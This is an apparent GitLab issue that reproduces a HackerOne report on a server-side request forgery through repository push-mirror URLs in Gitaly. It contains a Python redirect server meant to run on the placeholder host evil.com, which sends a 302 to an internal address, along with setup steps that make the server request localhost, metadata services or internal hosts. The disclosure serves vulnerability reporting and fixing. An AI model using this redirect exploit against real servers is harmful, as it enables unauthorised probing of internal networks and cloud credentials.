SSRF via repository mirror URL -- 302 Redirect
Opening a new issue here as suggested by #215879 (comment 381058501), the fix for #215879 (closed) would not address the 302 redirect bypass in this case.
https://hackerone.com/reports/904288 H1 report:
Summary
Gitaly supports HTTP redirects when running the git-receive-pack command. This issue allows a malicious authenticated user to send GET HTTP requests to arbitrary hosts, including the localhost, cloud metadata services and the local network, without reading the HTTP response.
Steps to reproduce
- Run redirect server on
evil.com
:
#!/usr/bin/env python
import SimpleHTTPServer
import SocketServer
class RedirectHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
if 'receive' in self.path:
self.send_response(302)
self.send_header('Location', 'http://0:1234')
else:
self.send_response(200)
self.end_headers()
def main():
handler = SocketServer.TCPServer(("0.0.0.0", 80), RedirectHandler)
handler.serve_forever()
if __name__ == "__main__":
main()
- Create a new project
- Add a commit to the repository
- Go to Settings > Repository > Mirroring repositories
- Add mirroring repository with URL:
http://evil.com